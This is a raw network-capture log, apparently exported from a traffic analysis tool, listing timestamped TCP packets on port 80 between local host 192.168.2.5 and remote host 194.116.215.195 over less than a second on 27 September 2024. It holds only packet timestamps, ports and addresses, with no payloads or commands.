                                                                          Sep 27, 2024 04:21:06.886600018 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886604071 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.886631012 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886646032 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886661053 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.886699915 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.886883020 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886936903 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.886948109 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886960030 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886989117 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.887012959 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.887022972 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887033939 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887044907 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887057066 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887063980 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.887073040 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.887088060 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.887155056 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887166023 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887172937 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887180090 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887242079 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.887717009 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887761116 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887763023 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.887774944 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887803078 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.887818098 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.887830973 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887842894 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887854099 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887892962 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.887911081 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.887969017 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887981892 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.887994051 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888005018 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888016939 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888027906 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888029099 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.888056040 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.888091087 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.888685942 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888698101 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888710976 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888731003 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.888751030 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.888784885 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888797045 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888807058 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888819933 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888834953 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.888853073 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.888856888 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888905048 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888912916 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.888916969 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.888942957 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.888958931 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.890965939 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.891032934 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976491928 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976541042 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976553917 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976564884 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976577997 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976591110 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976589918 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976612091 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976623058 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976628065 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976644039 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976656914 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976664066 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976686954 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976696968 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976700068 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976708889 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976739883 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976741076 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976751089 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976752996 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976764917 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976778984 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976795912 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976809025 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976809978 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976839066 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976850033 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976850033 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976877928 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976893902 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976928949 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976942062 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976953030 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.976979971 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.976994991 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977085114 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977097034 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977108955 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977134943 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977161884 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977174997 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977186918 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977199078 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977224112 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977242947 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977319956 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977363110 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977396965 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977410078 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977433920 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977447033 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977447987 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977478027 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977483988 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977519035 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977555990 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977569103 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977580070 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977611065 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977611065 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977619886 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977622986 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977638006 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977664948 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977679968 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977694035 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977706909 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977718115 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977732897 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977755070 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977771997 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977783918 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977783918 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977807999 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977832079 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977906942 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977919102 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977929115 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977941036 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.977957964 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.977972031 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.978086948 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978097916 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978112936 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978125095 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978132963 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.978136063 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978149891 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978168964 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978173971 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.978188038 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978199959 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978205919 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.978219032 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.978249073 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.978318930 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978329897 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978342056 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978353977 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978364944 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978368998 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.978378057 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978389978 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978400946 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.978401899 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.978435993 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.978452921 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981548071 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981559992 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981578112 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981587887 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981595039 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981595039 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981609106 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981610060 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981626987 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981651068 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981663942 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981676102 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981693983 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981714010 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981718063 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981731892 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981746912 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981759071 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981770039 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981786966 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981828928 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981841087 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981852055 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981864929 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981877089 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981884956 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981884956 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981889963 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981911898 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981918097 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.981941938 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.981967926 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.982140064 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.982151985 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.982163906 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.982176065 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.982182980 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.982193947 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.982196093 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.982215881 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.982239962 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.066962957 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.066987991 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.066998959 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067015886 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067048073 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067049026 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067049026 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067061901 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067073107 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067087889 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067090988 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067102909 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067109108 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067145109 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067152023 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067163944 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067190886 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067210913 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067224026 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067225933 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067248106 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067249060 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067267895 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067296982 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067316055 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067328930 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067339897 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067346096 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067377090 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067419052 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067425013 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067439079 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067449093 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067460060 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067471027 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067472935 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067488909 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067516088 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067519903 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067543983 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067564964 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067593098 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067611933 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067625046 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067648888 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067661047 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067688942 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067703962 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067718029 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067725897 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067729950 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.067749023 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.067770004 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068206072 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068255901 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068257093 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068269014 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068308115 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068322897 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068341017 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068351984 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068362951 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068373919 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068386078 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068417072 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068501949 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068512917 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068523884 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068536043 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068547010 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068557978 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068558931 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068571091 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068573952 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068592072 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068614006 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068806887 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068819046 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068829060 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068839073 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068850040 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068851948 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068861961 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068861961 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068871021 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068881989 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068893909 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068897009 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068907976 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.068917036 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.068954945 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069004059 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069016933 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069027901 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069039106 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069048882 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069053888 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069055080 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069081068 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069094896 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069117069 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069128990 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069139957 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069150925 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069161892 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069174051 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069175959 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069185972 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069199085 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069214106 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069250107 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069251060 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069466114 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069478989 CEST8049713194.116.215.195192.168.2.5
